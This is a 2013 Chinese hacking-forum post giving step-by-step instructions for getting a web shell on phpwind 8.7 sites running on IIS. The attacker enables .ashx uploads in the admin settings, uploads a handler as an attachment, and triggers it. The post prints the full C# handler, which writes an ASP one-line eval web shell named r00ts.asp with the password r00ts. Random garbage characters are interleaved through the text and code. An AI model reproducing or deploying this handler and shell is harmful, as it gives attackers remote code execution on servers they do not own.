找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2100|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
; V5 a; \+ V0 `4 g) E: N/ [ ! e) O) U, `1 o) c
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx/ p0 ~$ f# X3 X& B' b
) T# n. ?7 C0 X/ d' R
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整- _/ E7 P3 }# ~4 N% A0 n

7 ?" H' ]' T6 \5 o) ~2 ~$ c1 b然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx# F5 T' L. z: x* v0 |

+ I- R: v" H  b2 p+ X打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
7 ^0 Z0 F* O# Z% ?
$ U$ C) \4 q0 J  W$ w! f下面是代码:
8 m* L2 m2 Q" s4 _: e+ P2 y
& R( K  Z& O( I, x<%@ WebHandler Language="C#"Class="Handler" %>
! E; F5 n3 H: V* i' _8 f; N7 I) {using System;
& z6 Q' O$ _" b" eusing System.Web;
! G: v+ x2 W6 W% L7 W# r  B: f7 {using System.IO;
& x- g- G; |# {" W% V7 Q) ]public class Handler : IHttpHandler {- Q& _/ o# k+ I" L
public void ProcessRequest (HttpContext context) {
3 D* v$ h  M# k: {context.Response.ContentType = "text/plain";- e- ]( [# x/ ^: a" {: O
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));+ i1 t( E$ S1 `
file1.Write("<%eval request(\"r00ts\")%>");
* _$ ~. ^$ A1 b. ~" dfile1.Flush();( Q$ s7 S. u" K4 d% f
file1.Close();
! d  f; E) x# ^4 j- L}
+ Q1 f2 w1 R3 Y. _  b8 S- }public bool IsReusable {
1 A3 a8 E! L( w9 S7 mget {
6 x; r5 r! n7 mreturn false;5 _  _7 Q7 \' S! L8 i/ W
}
" h2 \6 |6 Z9 D7 P' @+ P/ t0 M}- y* ~, X% `0 b3 ]  S9 F
}8 d7 b! c! q" B( U1 p; d4 E) w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表